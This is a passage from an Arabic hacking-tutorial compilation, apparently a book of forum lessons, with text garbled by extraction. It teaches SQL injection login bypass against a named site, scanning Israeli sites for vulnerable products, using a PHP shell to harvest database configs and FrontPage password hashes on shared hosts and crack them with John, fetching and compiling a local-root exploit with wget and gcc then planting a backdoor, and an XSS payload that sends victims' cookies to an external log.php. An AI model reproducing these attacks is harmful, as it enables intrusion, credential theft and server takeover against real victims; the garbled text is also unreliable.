، يتضح / bin-cgi/il.com.www://httpمن البروكسي أحضار الموقع وھو يطلب

، في الحقیقه ال نبحث عن ثغرات سي جي آي ، / msql-3w/bin-cgiطلبنا لـ ، يعني المواقع WWWMSQLولكن نبحث عن كل المواقع التي يوجد بھا المنتج

تدخل اإلسرائلیه مثال التي جمعناھا في ملف تكست كلھا تأخذ واحد واحد و msql-3w/bin-cgiفي البرنامج الذي صممناه وترسل الى البروكسي بحثا عن

وثم يحفظ رد البروكسي في ملف خارجي ، وھكذا حتى ننتھي من كل المواقع داخھا والتي لم WWWMSQL، وثم نفتح الملف ونشوف التي تم إيجاد المنتج

اال أي موقع يعجبك يوجد ، ونتوجه الى سیكیورتي فوكس واال سیكیورتي تیم و يمكن msql-3w لـ Exploit ، مثال في سیكوتي تیم نجد msql-3wوابحث عن

تطبیقه من المتصفح ، وھو ھنا html.A3WUQBRFS2/exploits/com.securiteam.www://http

Random Hackingطريقه فحص عده مواقع بحثا عن منتج فیھا أسمیھا انا في المواقع msql-3wفعال بحثت عن يعني إختراق عشوائي ، ولكن لو

اإلسرائلیه فأنا أقول لك بأنك ما راح تلقى كثیر أو لن تجد شئ ، ممكن تبحث لترصد كل المواقع التي فیھا فرونت بیج ، وطبعا بعد ما يتم / pvt_vti_/عن

عشان كذا HTMLحفظ كل المعلومات المسترجعه من البروكسي تكون بشكل وافتحه وتجد كل المواقع ، اللي كتب عنھا html*.سق أنت خل الملف يكون بن

..The page cannot be displayed واللي Forbddien واللي ....not found الخ ، من ھذه الردود تعرف اللي نت فاوند واال موجود ولكن غیر مسموح ....

الخ بھذه الطريقه تعرف اللي موجود علیه واللي مو موجود ..بالوصول له والباقي علیك .....

390

كیف تستغل اي ثغره بعد الحصول علیھا-

وما عرفت تشغله أو قابلت فیه أخطاء c ما يبغا لھا فلسفه ، كود urlإذا كانت وھو الذي sh*.Shell أو perlفممكن تبحث عن فرجون ثاني لـه ولكن بلغه

لدوس بعد في ويندوز وتحدثنا عنھا في كوكب لغات البرمجه ، من اBatchيقابل بلغه بیرل ولكن exploit إذا كان الـ pl.perl exploitما تثبت أكتیف بیرل أكتب

طبعا فیه أشیاء تغییرھا في الكود نفسه ، وھذه األشیاء تكون مكتوبه بین وأكید بتواجه مشاكل إذا ما تعرف شئ في بیرل ، في :) عالمات التعلیقات

رجع لك رد طويل ما قدرت تقراه ممكن إذا:) ھذه الناحیه ال تطلب شرح بالصور pl .perl exploitوثم مسافه وإسم الملف مثال < تحفظ الخرج عن طريق عالمة

htm.log> Exploitوبالنسبه للمنتج أكتیف بیرل فقط تواجه فیه مشاكل ، ألن بعض الـ

كتب في اإلصدار أربعه وممكن خمسه وممكن ما يعمل زين في أكتايف بیرل تضطر لتغیر المفسر عندك أو تعدل في الكود وھذا كله يطلب خبره في لذلك قد

فیه مفسر بیرل ممتاز ) 26RedHat.أعمل على (اللغه ، وعلى فكره لیونكس جدا افضل من أكتیف بیرل بعشرات المرات

391

SQL Injection كیفیة اكتشاف ثغرات الـ

Devil -00:للكاتب

و انا احبھا .. .. نواع الثغرات المعروفهونوع من ا.. الیوم درسنا حلو كثیر اسم دون كلمة سر او.. الیوم راح ندخل كمستخدم عادي لبرنامج صغیر

ونتعلم الترقیعه لھذا النوع من الثغرات.. مستخدم

على المقاالت التي ساعدتني كثیر في ھذا الدرس .. شكر خاص للماحي **..

<?php /*################################ # SQL Injection -- Part # # Coded By : Devil-00 # # PHP IS More Safe With Me # # [email protected] # ##################################*/ $Connect = mysql_connect('localhost','root','***') or die(mysql_error()); $Select = mysql_select_db('mysbb'); /*----------------------------------------------------------------*/ if (!isset($HTTP_POST_VARS['usernamee'])){ ShowForm(); }else{ Login(); } /*----------------------------------------------------------------*/ /*------ Function -------*/ function ShowForm(){ echo ' <html> <body> <b>Devil ~ 00 || SQL Injection Part 2</b> <form method="post"> Username :-<br> <input type="text" name="usernamee" size="50" maxlength="30"><br> Password :-<br> <input type="password" name="passwordd" size="50" maxlength="30"><br><br> <input type="submit" name="login" value="Login" size="30"> </form>

392

<b>Security4Arab - <a href="http://www.s4a.cc/forum/">http://www.s4a.cc/forum/</a> || MySBB - <a href="http://www.mysmartbb.com/forums/">http://www.mysmartbb.com/forums</b> </body> </html> '; } function Login(){ $Query = "SELECT * FROM MySBB_member WHERE username='".$_POST['usernamee']."' AND password='".$_POST['passwordd']."'<br><br><br>"; echo $Query; $SQL_Query = mysql_query("SELECT * FROM MySBB_member WHERE username='".$_POST['usernamee']."' AND password='".$_POST['passwordd']."'") or die(mysql_error()); $NumRows = mysql_num_rows($SQL_Query); if($NumRows != 0){ die("Oky"); }else{ die("Error"); } } /*----------------------*/ ?>

: الشرح

if (!isset($HTTP_POST_VARS['usernamee'])){ ShowForm(); }else{ Login(); }

تسجیل ھذا الكود يقول لو اسم المستخدم غیر موجود تتم علمیة اظھار فورم

و ان وجد يتم تسجیل الدخول... الدخول ** دوال كتبتھا بنفسي **

: -االن اخراج الفورم على ھذا الشكل

<html> <body> <b>Devil ~ 00 || SQL Injection Part 2</b>

393

<form method="post"> Username :-<br> <input type="text" name="usernamee" size="50" maxlength="30"><br> Password :-<br> <input type="password" name="passwordd" size="50" maxlength="30"><br><br> <input type="submit" name="login" value="Login" size="30"> </form> <b>Security4Arab - <a href="http://www.s4a.cc/forum/">http://www.s4a.cc/forum/</a> || MySBB - <a href="http://www.mysmartbb.com/forums/">http://www.mysmartbb.com/forums</b> </body> </html>

: -usernamee فراغ اسم المستخدم : -passwordd وفراغ كلمة السر

: -POST والعملیة تتم عن طريق

تظھر .. حاول تسجیل دخولك عن طريق اسم مستخدم و اي كلمة مرور االن : -الستعالم على ھذا الشكلا رسالة الخطا و يكون

SELECT * FROM MySBB_member WHERE username='devil' AND password='devil'

اي اوكي الحظنا انه ال يوجد عملیة تشفیر لكلمة السر او اسم المستخدم او : - شيء يمنع كتابة كود سكل

ويتم .. ر دون كلمة مرو والكود السوف نضیفه سوف يسمح لنا بدخول البرنامجوھي MD 5التبیق على قاعدة بیانات كلمات المرور ففیھا مشفره بمقیاس

.. " منتدى العرب" لبرنامج

394

: الكود السوف نعطیه للحقالن

' or 'devil'='devil

الكن لیس.. وعند تسجیل الدخول تظھر رساله تقول انه تم تسجیل الدخول ھذا المھم ھھھھھھھه المھم نعرف كیف ؟

الشكل يظھر لنا االستعالم على ھذا

SELECT * FROM MySBB_member WHERE username='' or 'devil'='devil' AND password='' or 'devil'='devil'

: شرح الكود

ديفل و الباس ورد تسواي اي = يساوي اي شي او ديفل لو اسم المستخدم العملیه يتم قبول... ديفل = شي و ديفل

بالدخول يعني انه الشرط تطبق و تم السماح... ديفل = قلنا ديفل .. نحن و

: -اوكي نشرح الكود الي تم استعماله

' OR 'devil'='devil

لقد قمنا باغالق قوس اسم المستخدم و كلمة المرور و اضافة الجمله اور : -بالستغالل

' OR

395

: -لدخولوھنا اضفنا الشرط الذي تحقق و سمح لنا با

'devil'='devil

وھكذا.. النه موجود بالستغالل الرئیسي .. الحظ لم يتم اغالق اخر قوس .. انتھى الدرس

===============

قم بتشفیر كلمة المرور على .. اغالق الثغره ھوين جدا .. للمبرمجین .. االن

md 5 مثال على التشفیر بمقیاس الـ اي مقیاس و ھذا

<?php /*################################ # SQL Injection -- Part2 # # Coded By : Devil-00 # # PHP IS More Safe With Me # # [email protected] # ##################################*/ $Connect = mysql_connect('localhost','root','defwebpass') or die(mysql_error()); $Select = mysql_select_db('mysbb'); /*----------------------------------------------------------------*/ if (!isset($HTTP_POST_VARS['usernamee'])){ ShowForm(); }else{ Login(); } /*----------------------------------------------------------------*/ /*------ Function -------*/ function ShowForm(){ echo ' <html> <body> <b>Devil ~ 00 || SQL Injection Part 2</b>

396

<form method="post"> Username :-<br> <input type="text" name="usernamee" size="50" maxlength="30"><br> Password :-<br> <input type="password" name="passwordd" size="50" maxlength="30"><br><br> <input type="submit" name="login" value="Login" size="30"> </form> <b>Security4Arab - <a href="http://www.s4a.cc/forum/">http://www.s4a.cc/forum/</a> || MySBB - <a href="http://www.mysmartbb.com/forums/">http://www.mysmartbb.com/forums</b> </body> </html> '; } function Login(){ $Query = "SELECT * FROM MySBB_member WHERE username='".$_POST['usernamee']."' AND password='".md5($_POST['passwordd'])."'<br><br><br>"; echo $Query; $SQL_Query = mysql_query("SELECT * FROM MySBB_member WHERE username='".$_POST['usernamee']."' AND password='".md5($_POST['passwordd'])."'") or die(mysql_error()); $NumRows = mysql_num_rows($SQL_Query); if($NumRows != 0){ die("Oky"); }else{ die("Error"); } } /*----------------------*/ ?>

===============

397

: فوق ھو الكیفیه وھنا راح اعطیكم مثال وتطبیق عملي علیه الي

: ھذا الموقع مصاب /admin/com.radiofann://http

: بالصفحة نجدھا كالتالي االن نذھب الى السورس الخاص

<html> <head> <title>Adminstration for radiofann</title> <meta http-equiv="Content-Type" content="text/html; charset=windows-1256"> </head> <body bgcolor="#7C93D0" text="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <p> </p> <p> </p> <form action="verify_user.php" method=post> <div align="center"> <table width="380" border="0" cellpadding="0" cellspacing="0"> <tr> <td width="13" align="right" valign="top" bgcolor="#D2DCF7"><img src="images/billing_1.gif" width="13" height="13"></td> <td colspan="5" bgcolor="#D2DCF7"> </td> <td width="12" align="right" valign="top" bgcolor="#D2DCF7"><img src="images/billing_3.gif" width="12" height="13"></td> </tr> <tr> <td bgcolor="#D2DCF7"> </td> <td colspan="5" align="center" bgcolor="#D2DCF7"> <table width="333" border="0"cellspacing="0"cellpadding="2"> <tr align="center"> <td colspan="2"> <p><b><font face="Verdana" size="3">Login Page</font></b></p> </td>

398

</tr> <tr> <td width="112"> <div align="center"><font size="2"><b><font face="Arial, Helvetica, sans-serif"> Username</font></b></font></div></td> <td width="213"> <input name="userid" type="text" id="userid" value="" size="20"> </td> </tr> <tr> <td> <div align="center"><font size="2"><b><font face="Arial, Helvetica, sans-serif">Password</font></b></font></div></td> <td> <input name="password" type="password" value="" size="20"> </td> </tr> <tr align="right"> <td colspan="2"><span class="Arial8"><strong> <input name="myaccount" type="checkbox" id="myaccount" value="checkbox" > </strong></span> <font color="#002187" size="1" face="Verdana"><strong> Remember my </strong><b>Username & Password</b></font></td> </tr> <tr align="center"> <td colspan="2"> </td> </tr> <tr align="center"> <td colspan="2"><font face="Verdana" size="2"> </font> <font face="Verdana" size="2"> <input type="submit" name="Submit" value="Submit"> <input type="reset" name="reset" value="Reset"> </font></td> </tr> </table> </td> <td bgcolor="#D2DCF7"> </td>

399

</tr> <tr> <td align="right" valign="bottom" bgcolor="#D2DCF7"><img src="images/billing_2.gif" width="13" height="12"></td> <td colspan="5" bgcolor="#D2DCF7"> </td> <td align="right" valign="bottom" bgcolor="#D2DCF7"><img src="images/billing_4.gif" width="12" height="12"></td> </tr> </table> </div> </form> </body> </html>

: االن نالحظ شي مھم ھو

<input name="userid" type="text" id="userid"

: طلع اسم المستخدم ھو

userid

االن خالاص المھمه صارت بسیطة نضیف ھذا الكود في اسم المستخدم وفي : %100مكان الباسورد وراح ندخل

' OR 'userid'='userid

400

) phpshell(تعلم

MASTER -EVIL:للكاتب


ة فى ھذا الدروس المشروح طبعا الكل كان بینتظر الدرس ده بفارغ الصبر لقلة المجال

وشامل فى ھذا واسف على التاخیر الى كان سببه انى اكون درس كامل المجال الواسع

وانشاء اهللا ربنا يوفقنى فیه الشروح واعضاء المجموعة الى ساعدونى فى وضع وبشكر مقدما اخوانى

---------- Joun

X-Digital Islam.Eng Risk_8Q

--------- الكن مین بیعرفه جیدا او phpshell بیسمع عندرسنا طبعا الكل نبداء

استخدمه من قبل .المبتدئین ما بیعرفو حتى معناه او میزته طبعا

االساس على اختراقك لموقع اى بیعتمد فى phpshell االختراق عن طريق موقع على النت

عملیة السیطرة على السرفر كله اى وتبدا فى phpshell وبعدين تحمل علیه الشركة

علیھا بتكون ملكك اذا احسنت المستضیفة للموقع كل المواقع المستضافة استخدام

phpshell الشیل الى اقصى درجة وفى الدرس ھنعلمك اذاى تسفید من .ممكنة

عنك كانك رفعته النى الحین الكنى ھتكلم phpshell انا مش ھتكلم عن رفعك محضر لیكم ھدية

عن طريق مثال صغرة فرونت ترقت موقعفى موضوع الرفع المھم انت الحین اخ ftp بیج ودخلت على

مجرد فولدر بتحمله على الموقع وحملت الشل وما تخاف من التحمیل ده

401

ونمبداء فى استخدام الشلفیه سطر اوامر مثل اللیونكس تمام ونفس اوامر عن طريق المتصفح وبیكون

اللیونكس ھى اوامرphpshell ائة الدرس البحث عن اوامر اللیونكس كدانا بنصحك بعد قر علشان

الشل كده تمام احنا علىتعمل ايه انت االن لیس من صالحیاتك انك تعدل فى اى شىء الكنك مسموح

بقرائة مجموعة كبیرة جدا من ملفات السرفر لك انا اعرف كلمات السر منین ؟ وديه میزة كبیرة جدا الزم نستغلھا طیب

للمواقع المستضافة تحاول توفر افضل الخدماتطبعا كل الشركات المستضیفة ب ذى دعم الفرونت بیج

االعلى سرفرات الیونكس وده بیكون لعبتنا وما تنسى الشیل ما بعمل اللیونكس وفى الحالة العادية مش الساف مود

الشیل بعض اوامر

----------------------------------------------------- A : access الكتابة, من حیث امكانیه القراءة لفحص ملف .. : at معین لتنفیذ امر في تاريخ ووقت : alarm لعمل منبه : accept لقبول اتصال على سوكیت . B : batch لتنفیذ امر عندما يحصل على تصريح : buildhash امالئي مدقق C : cat لعرض محتوى اكثر من ملف مع بعض : cd ي انت علیهالدلیل الذ لتغیر : chmod لتغیر تصريح دخلول ملف معین : chown مالك ملف معین لتغیر : clear لمسح كل الذي على الشاشة : cmp لمقارنة ملفین

402

: cp لنسخ الملفات : crypt لتشفیر و فك تشفیر الملفات : csplit الى عدة ملفات لتقسیم الملف : cu لطلب تريمنال يونكس اخر D : ate dالتاريخ و الساعة الظھار : df المساحه الخالیة( لتقديم تقرير عن مساحه القرص .. ) : diff لمقارنه ملفین : 3 diff ملفات او اكثر3لمقارنه : dircmp لمقارنه دلیالن : du تقرير عن مساحه القرض المستخدم E : echo يستخدم الظھار سطر نكتب فیه تیكست ( ed : or text editمثل الورد يعني ) : egrep مثل االمر grep ( ex : text editor مثل الورد يعني ) F : file للتقرير عن نوع ملف : find للبحث عن ملفات : finger تقرير عن مستخدم G : g ++كومبیلر لل++ Cو C : gcc كومبیلر لل++ Cو C : grep يستخدم للبحث عن شئ داخل ملف : gzip لضغط ملفات : gunzip لضغط ملفات

403

H : haltsys الغالق النظام : head من الملف اسطر10الظھار اول I : ispell مدقق امالئي K : kill ** عملیه النھاء L : line لقراءة ملف سطر معین في ملف : ln معین لعمل لینك ملف : logname خاص بكللحصول على اسم الدخول ال : lpr ارسال طلب للطباعه : lprint للطباعه بالطابعه المحلیه : lpstat لتقديم تقرير عن حاله الطباعه : lpq لتقديم تقرير عن حاله الطباعه : ls لعرض محتويات مجلد

M : mail الرسال و استقبال ايمیالت : man للحصول على معلومات عن اي امر : mkdir جديدلعمل دلیل : more لعرض الملفات

404

P : passwd النشاء كملة سر او تغیره : pr لطباعه ملف : ps تشغیلھا العملیات عن العملیات التي تم : pstat لعرض حالة النظام : pwd االن لعرض المسار الذي انت فیه R : rm لمسح ملفات او مجلدات خالیه : rmdir خالي لمسح مجلد

الشیل منقولة مناوامرPharaonics Team

---------------------------------------- نبداء بالسھل االول

البحث عن كلمات السر لقواعدالبیانات وھو الغیر مشفرة اكتب لو عاوز تخترق قواعد البیانات وكلمات السر

php.name config-/ find

الشكل السرفر بھذاالكونفیج على ھیجیلك كل البرامج الى فیھا--------------------------------------------------------------------------------

php.config/phpsite/httpdocs/ws.idks/vhosts/apache/plesk/local/usr config/cnf_vti_/phpsite/httpdocs/ws.idks/vhosts/apache/plesk/local/usr

php. php.config/forum/httpdocs/ws.idks/vhosts/apache/plesk/local/usr

phpBB/httpdocs/net.dudewherestherave/vhosts/apache/plesk/local/usrphp.config/2 php.config/httpdocs/com.today-ukraine/vhosts/apache/plesk/local/usr php.igconf/forum/httpdocs/com.galazxy/vhosts/apache/plesk/local/usr myli/modules/21k/httpdocs/com.galazxy/vhosts/apache/plesk/local/usrphp.config/cache/nks new/modules/21k/httpdocs/com.galazxy/vhosts/apache/plesk/local/usrphp.config/bb

405

new/modules/21k/httpdocs/com.galazxy/vhosts/apache/plesk/local/usrphp.config/cache/s syst/modules/21k/httpdocs/com.galazxy/vhosts/apache/plesk/local/usrphp.config/cache/em

admi/blacktalons/httpdocs/net.eliteclans/vhosts/apache/plesk/local/usrphp.config/n php.config/forum/httpdocs/net.eliteclans/vhosts/apache/plesk/local/usr php.config/bbs/httpdocs/net.kunjip/vhosts/apache/leskp/local/usr

-thirdeye/vhosts/apache/plesk/local/usrphp.config/forum/httpdocs/com.dod

-thirdeye/vhosts/apache/plesk/local/usrphp.config/2phpBB/httpdocs/com.dod

-------------------------------------------------------------------------------- تعرف تشوف الى داخل الملف تكتب وعلشان

-thirdeye/vhosts/apache/plesk/local/usr/cat

php.config/2phpBB/httpdocs/com.dod

يظھرلك مثال صفحة الكونفیج راح

البینات وفیھا كلمة المرور والیوزر نیم واسم قاعدة الى امتداده على) منتدى(ا عرفینه الى كلنphpBB 2الى بتخص البرنامج

الموقع2phpBB/com.dod-thirdeye.WWW

خالل البرنامج ده وتقدر تشبك مع قاعدة البیانات منFront-MySQL

ندخل بقى على الجد طیب احنا الحین خلصنا من كلمات السر الغیر مشفرة

للمستخدم وذى ما قلت فى االعلى كل الشركات بتحاول تقدم افضل دعم

ومن ھذه الدواعم للسرفر الفرونت بیج وده الى راح يفتح لنا البوابة الكبیرة

بیج بیكون فیه كلمة السر فى الفرونتانتو طبعا عرفین ان الملف الىpwd.service/pvt_vti

406

بالطبع مكانه على انا مش ھقولك مكان الملف على السرفر الكنك عارف الموقع لیش انا مابريد اقول مكانه على السرفر

تقسیمة خاصة لنظم الملفات المھم ايه الحل البديل الحل ھو الن كل سرفر له لملفا انك تكتب امر البحث عن

pwd.name service-/ find

يعنى فى الجزر الرئیسى عن الملف (/) احنا فى االمر الى فات قولنا ابحث فىpwd .serviceمثال وھتكون النتیجة

--------------------------------------------------------------------------------

pvt_vti_/httpdocs/com.heaternextstaget/vhosts/apache/plesk/local/usrpwd.service/ servi/pvt_vti_/httpdocs/com.motherlobe/vhosts/apache/plesk/local/usrpwd.ce

s/pvt_vti_/httpdocs/com.urbanspacesny/vhosts/apache/plesk/local/usrpwd.ervice pvt_vti_/httpdocs/com.mysticalgammon/vhosts/apache/plesk/local/usr

pwd.service/ pwd.service/pvt_vti_/httpdocs/us.qfx/vhosts/apache/plesk/local/usr servi/pvt_vti_/httpdocs/net.rpec.intranet/vhosts/apache/plesk/local/usrpwd.ce

se/pvt_vti_/httpdocs/com.rayonierpamill/vhosts/apache/plesk/local/usrpwd.rvice

service/pvt_vti_/httpdocs/com.pamillsite/vhosts/apache/plesk/local/usrpwd.

-------------------------------------------------------------------------------- موقع حسب 100ده عدد قلیل جدا من المواقع انت ھیظھرلك على االقل طبعا

على السرفر عدد المواقع الى من النواتج للبحث ؟طیب احنا استفدنا ايه

com. pamillsiteانا عرفت ان كلمة السر الخاصة بموقع استفدنا كثیر فمثال

ده موجودة على االمتدادservice/pvt_vti_/httpdocs/com.pamillsite/vhosts/apache/plesk/local/usr

pwd.

407

انى لو كتبت اىcat

servic/pvt_vti_/pdocshtt/com.pamillsite/vhosts/apache/plesk/local/usr/pwd.e

يعرض لى كلمت السر الخاصة بالموقع شفت ان الموضوع سھل جد وما راح

محتاج اى تعب لفك التشفیر ناتى

كل ال تفك تشفیر موقع وتنتظر الناتج ده مش عملى على االطالق انت تجمع كلمات السر الى على السرفر وتضعھا فى ملف واحد باسم

txt.passwd شكله مثال وھیكون

--------------------- wJhyXfDlEIk9p:jthomas

WbU6uyFtvzEic:ifabc HfA1QfE8064dx:joram

2j/ni85HxcPUY:akron Uo/Jp5oG8k1B9:hpoe

s3vCYtKGUyLO6:amwab XM2FDHZxUzq2A:antsi BM1HeAEGXR7NI:hsheini

lc6PDBdOXeHxL:nskribne .apscPCSCmLV8:besta 2bkMWd0BP2G8k:bibic

ybRU6w.UgBiD6:bobpr ---------------------

wJhyXfDlEIk9 pحیث كلمة السر المشفرة

jthomas الیوزر نیم

راح يكون اسرع وھتحصل على نتائج فى اقل من خمس ثوانى والبرنامج كدا ھیفدكم اتكككم معاه joun واعتقد ان االخ

408

اھال بیكم اخوانى 60امر تمش علیھا بالترتیب وراح تفك اكثر من من االو انا راح اعطیكم مجموعة دقیقة فى المائة فى اقل من

نبداء على بركة اهللا

-------------------------- txt.single passwd-john txt. passwd3:savemem-john txt.digits passwd-john txt.alpha passwd:i-john txt.all passwd:i-john

------------------------- االعلى اخوانى اھم شىء الترتیب من

pot. johnبعد اما فكیت كلمة السر الى بتالقیھا فى الملف االتى النوت باد ھیظھرلك ھتفتحه على

---------------------- cipell:6/s31h.t8GKFr ideia:w7W.1aN7JkE39

juntolli:rfIM1ArwaUy5w pradotel:MsQ.1pFhI9toh

29balada:ZcIXE4K4cXbFL 123456:lHOM8L/SZqqtC 123456:bE0Jab3fgJCj8 hendrix:SCcoLYxDqIGzc

metal:kCc2kEGY3tTkN ---------------------

ذى انتو ما شیفین السطر نصفین كلمة السر المشفرة طبعا الكسر وكلمة السر بعد

:s31h.t8GKFr/6المشفرة :cipellالمكسورة

عن كلمة السر المشفرة الى انت فكیتھا وتبحث طیب ترجع لملف كلمات السر

409

ھذه6/s31h.t8GKFr

الیوزر نیم الخاص بیھا وتشوف ايه Mster- Evilاترككم تكملو مع االخ

اخوانى اھال

الخاص بالموقع وتكتب الیوزر نیم وكلمة السر ftp تدخل على مواقع لما بكتب اف تى بى واسم الموقع ما بیفتح ھتقولى فى

غیر كلمة سر وال يوز نیم لنى على الخدمة منوفى مواقع بدخ انا اقوله اكید وده مش مشكلة ممكن نحلھا

اكتب/com.pamillsite@cipell://ftp

الیوزر نیم cipell حیثنت راح يسالك عن كلمة المرور وبكدا تدخل على الموقع وتعمل الى ا وھو

عاوزه االتیة ملفات الموقع فى احد االمتدادات ھتالقى

------------ www

اوhtml_public

اوhttpdocs

------------

انصحكم بان تضع الشیل على الموقع وما تغیر شىء فیه ويكون فى الكنى مكان مش ظاھر

فولدر للصور او اى شىء من ھذا حتى ما يالحظ صاحب الموقع ويغلقه يعنى اى شىء وما تستفاد انت

انا كنت تكلمت عن ھدية باالعلى وھى انى سوف اعطیكم مجموعة من كلمات السر المشفرة تجربو فیھا

شیل ھدية والى ھیجبلى كلمة سر مفكوكة لیه joun نصائح االخ

410

شوفتم السخاء انا ديما اخوكم وفى الخدمة لسر المفكوكةالخاص بیكم بكلمة ا بس ما تنسوى ارفاق االيمیل

المجموعة واسف على اى تقصیر من ناحیتى ومن

-------------

411

أخذ رووت+ طريقة البحث عن األكسبلويتات

Cyrus :للكاتب

نبدا بأسم اهللا الرحمن الرحیم

: راح نتطرق بموضوعنا الى شیئین مھمین طريقة البحث عن اكیسبلويتات النظام1- اخذ رووت على السیرفر2-

============================= : -بسم اهللا نبدأ

طريقة البحث عن االكسبلويتات1-

: واكتب األمر التالي phpshell اول شيء اخوي روح للشیل

:كود :كود

cat /etc/issue

االمر ده حیجبلنا اشیاء مھمة زى النظام واصدار الكیرنل طیب

الى يطلعلى طیب دلوقتى حتقلى ايه)Valhalla (7.3Red Hat Linux release

m\r on an \Kernel

ايوة كدا تمام

7.3لینكس رد ھات واالصدار red hat linux دلوقتى انت عرفت ان النظام ھوة

412

تعطیك لوكل رووت مممممممم دلوقتى ھذا االصدار فیه لھا اكسبلويتات

: مثل.. دلوقتى روح ألي موقع سیكورتي

com.ussecurityfoc أو/com.securiteam.www://http

: واكتب في مربع البحث التالي7.3Red Hat Linux release

.. ودور على اكسبلويت يعطیك لوكل رووت

... طیب انت الحین بتقولي طلعت لي صفحات كثیره وووو

لین تحصل موضوع عن .. اقرا عناوينھا .. مات اشمل معلو بقوله لو تبي

وممكن تلقى مواضیع تفیدك .. اكسبلويت يديك لوكل رووت

: جوجل واكتب مثال رح افتح )انا افضل الطريقه ھذي.. ( ولو ماتبي exploit 7.3Red Hat Linux release

local root وابحث عن الي فیھا

: سبلويتاوووووو بس انا حصلت ھذا االكc.sux_GNATS-82x0/de0c/me0h/org.inetcop.82x://http

.. شباب دلوقتى انتھینى من القسم األول من الموضوع طیب

.. الطريقه تمام انشاهللا االن فھمتو===========================

على السیرفر اخذ رووت2-

.. طیب يالشیخ بعد ماحصلت على االكسبلويت للنظام

: الحین رح اكتب األمر بالشیل

413

:كود

id

يوزر وطلعت لي الصالحیات

)data-www(33=groups) data-www(33=gid) data-www(33=uid

tmp ننتقل للملف طیب االن

نكتب األمر :كود

cd /tmp

tmp لفالم عشان ندخل وبعدھا نكتب األمر

:كود

pwd

وراح يطلع لك

/tmp

)6(ـ tmp ھذا معناه انك اكید بملف

بالشیل wget طیب الحین نكتب األمر : واذا طلع لنا كذا

missing URL: wget .......... تمام يعني

777الزم نسوي تصريح.. واذا طلع كالم يختلف عن الي طلع لي قبل شوي

: ه ھي اكتب االمر ھذاوالطريق :كود

414

chmod 777 tmp

.. االن المھم

: نروح نكتب األمر ھذا-82x0/de0c/me0h/org.inetcop.82x://wget http]IMG[]IMG[/c.sux_GNATS

.. االكسبلويت للشیل عشان نجیب

: وبعدھا نكتب األمرls

tmp وتطلع لنا الملفات الي بـ

:وراح يطلع من ضمنھا الملفc.sux_GNATS-82x0

%100االن تمام الشغل

0c.sux_GNATS-82xطیب نسوي كومبايل للملف

: بالطريقه ھذي :كود

gcc -o 0x82-GNATS_sux 0x82-GNATS_sux.c

: نكتب االمر يعنيo-gcc

وبعده اسم ملف االكسبلويت . cنكتب اسم الملف مع االمتداد وھو وبعد اسم ملف االكسبلويت

: ب االن بعد كذا نكتب األمرطی

415

ls tmp وراح تطلع لنا الملفات مره اخرى الي بملف الـ

: الملف نفسه والكن بدون امتداد بالشكل كذا راح تالحظ وجود

sux_GNATS-82x0 c.sux_GNATS-82x0

سوينا كومبیل للملف وھذا يعني ان كل شيء میه میه واننا

0xsu_GNATS-82xطیب االن نشغل الملف : باألمر

:كود

]IMG[/sux_GNATS-82x0]./IMG[

: األمر طیب بعد كذا نروح نكتب بالشیلid

اووووووووه بس انت االن رووت رووت وطلعت لك الصالحیات

ھنیئا لك

رحو ارفعو باكدور بقولكم.. طیب االن ياشباب بعد كذا بتقولون وش اسوي

عشان تضمن رجوعك للسیرفر باي وقت

.. وتجد كل شيء عن الباكدور حث ھنا بالمنتدىرح اب أو الرووت كیت على األقل

. راح تسوي اشیاء كثیر مره.. الباكدور طیب بتقولون وش اسوي بعد

ابحث عنھا وعاد انت ودماغك

وراح اشرح وش تسوي بعد الرووت قريــب إن شاء اهللا

تستفیدون من الموضوع وتمنى منكم ان

416

xssاستغالل ثغرات

Drox_ Linux:للكاتب

ثغرات االن ھذا اول درس لي بھذا القسم وھو يتكلم عن كیفیه استغاللxss

xss طیب نأتي االن الى الكود المھم في ثغرات

xss سكربت خبیث يأتي بمعلومات الكوكیز تجده دائما في ثغرات ھذا كود

<Script>javascript:alert(document.******)</Script>

الكود ھذا لم يكون بالثغره سوف يظھر لك الكوكیز تبعك وھو يحتوي على األن : نقاط مھمه وھي

رقم العضويه1- md 5الباسورد مشفر2- Hash الباسورد مشفر 3-

!على حسب نوعیه البرنامج المصاب,, ورقم االستايل وغیره

وجدت ھذا الكود سوف نربطه باللوج طیب الحین

اللوج ؟ماھو وبعد ان تربطه كل من فتح ,, السكربت الذي ياتي بالكوكیز اللوج ھذا تربطه مع

سوف يسجل معلومات الكوكیز تبعه باللوج او يرسل السكربت وھو مربوط باللوج )على حسب اللوج( الى ايمیلك

: طیب االن بعد ما ربطته اصبح الرابط

<Script>location.href="http://www.xxxxx.com/log.php?id="+document.******</Script>

417

: االن تمام/com.xxx.www://http = الموقع المربوط فیه اللوج

= php .logاسم ملف اللوج اي موقع عندك وبعد كذا تستبدل طیب الحین نرفع اللوج على

php.log/com.xxx.www برابط اللوج الي عندك

السكربت اصبح جاھزا لالستعمال سوف نضعه بكود الثغره المھم االن ھذا : ونستبدل


بـ

<Script>location.href="http://www.xxxxx.com/log.php?id="+document.******</Script>

نخلي مثال المدير العام او اي عضو تبي تسرق الكوكیز تبعه انه يفتح الرابط االن

الرابط عاد بطريقتك خلیه يفتح) 6(بتقول كیف بقولك ياااولد انت وراااااسك

نده ع طیب الحین بتقولي واهللا فضیحه يابو خالد لم اخلیه يفتح الرابط يطلع اللوج وبیكشفني

للتمويه بقوله وال يھمك اخوي نربطه كمان بموقع

بحیث انه لم يفتح الثغره com.google.www://http/ مثال نربطه بموقع

وبكذا اللوج وموقع جوجل راح يتحول اوتوماتیك الى جوجل والمربوط فیھا مايشك

418

: بتقول كیف يابو خالد بقولك كذا نضع بعد رابط اللوج&com.google.www=re

بس الخ id ...يوجد & بحیث يكون بعد : يعني يكون الكود

<Script>location.href="http://www.xxxxx.com/log.php?re=www.google.com&id

="+document.******</Script>

باي موقع تبغاه ويفضل يكون com.google.www://http/ استبدل طبعا انت

)1(الموقع الي مصاب فیه الثغره

م يابو خالد ياهللا عطنا مثااالكذا تما طیب الحین تقول

: Invision Power Boardبمنتديات بعطیكم مثال لثغره الي اكتشفتھا انا

: الكود للثغره=idx=act?php.index/forums/com.xxx://http>script/<.******)document(alert>script'><

: راح نستبدل احنا


بـ

<Script>location.href="http://www.xxxxx.com/log.php?re=www.google.com&id="+document.******</Script>

ھنا موقع جوجل باي موقع تبغاه واستبدل

تبعك باللوج php.log/com.xxx.www ورابط اللوج

419

==================== : تطبیق

: التطبیق ھنا

http://www.mahrum.com/forums/index.php?act=idx='><script>alert(document.

******)</script>

=================== : اللوج

<?php

